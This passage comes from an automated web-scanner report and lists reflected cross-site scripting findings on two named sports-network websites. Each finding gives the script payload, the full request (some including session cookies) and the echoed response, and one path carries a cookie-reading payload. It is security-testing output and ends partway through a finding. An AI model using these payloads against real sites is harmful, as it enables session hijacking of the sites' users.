The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e51"><script>alert(1)</script>0d5c9babaf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.230. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c95"><script>alert(1)</script>31f08011031 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.231. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 358b2"><script>alert(1)</script>d0de32d96b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40295
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.232. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd16"><script>alert(1)</script>95264bab223 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html">
...[SNIP]...

2.233. http://www.csnbayarea.com/pages/landing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/landing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf79"><script>alert(1)</script>0bab4ba8ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing?1cf79"><script>alert(1)</script>0bab4ba8ccc=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 51177
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="1cf79"><script>alert(1)</script>0bab4ba8ccc" id = "1cf79">
...[SNIP]...

2.234. http://www.csnbayarea.com/pages/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae73"><script>alert(1)</script>36ec9c80c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/profiles?bae73"><script>alert(1)</script>36ec9c80c16=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 52908
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="bae73"><script>alert(1)</script>36ec9c80c16" id = "bae73">
...[SNIP]...

2.235. http://www.csnbayarea.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7398"><script>alert(1)</script>58cec5b7caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?f7398"><script>alert(1)</script>58cec5b7caa=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 76152
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="f7398"><script>alert(1)</script>58cec5b7caa" id = "f7398">
...[SNIP]...

2.236. http://www.csncalifornia.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b5a"><script>alert(1)</script>20777afd731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?13b5a"><script>alert(1)</script>20777afd731=1 HTTP/1.1
Host: www.csncalifornia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:01 GMT
Connection: close
Set-Cookie: PHPSESSID=7ec6ef4cff790030950ccceec1a36f22; path=/
Content-Length: 98170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="13b5a"><script>alert(1)</script>20777afd731" id = "13b5a">
...[SNIP]...

2.237. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d407"><script>alert(1)</script>b63af54bf8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.238. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce80c"><script>alert(1)</script>e0e2993fc81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.239. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef888"><script>alert(1)</script>c0087ef2dd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.240. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1d4"><script>alert(1)</script>e7c9caf2624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html">
...[SNIP]...

2.241. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ead4d"><script>alert(1)</script>92c61a9dd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html?ead4d"><script>alert(1)</script>92c61a9dd4f=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51651

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="ead4d"><script>alert(1)</script>92c61a9dd4f" id = "ead4d">
...[SNIP]...

2.242. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e20"><script>alert(1)</script>337775cf04b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.243. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d81e"><script>alert(1)</script>1ea0c328bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.244. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22d00"><script>alert(1)</script>3b9a8daff6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:36 GMT
Connection: close
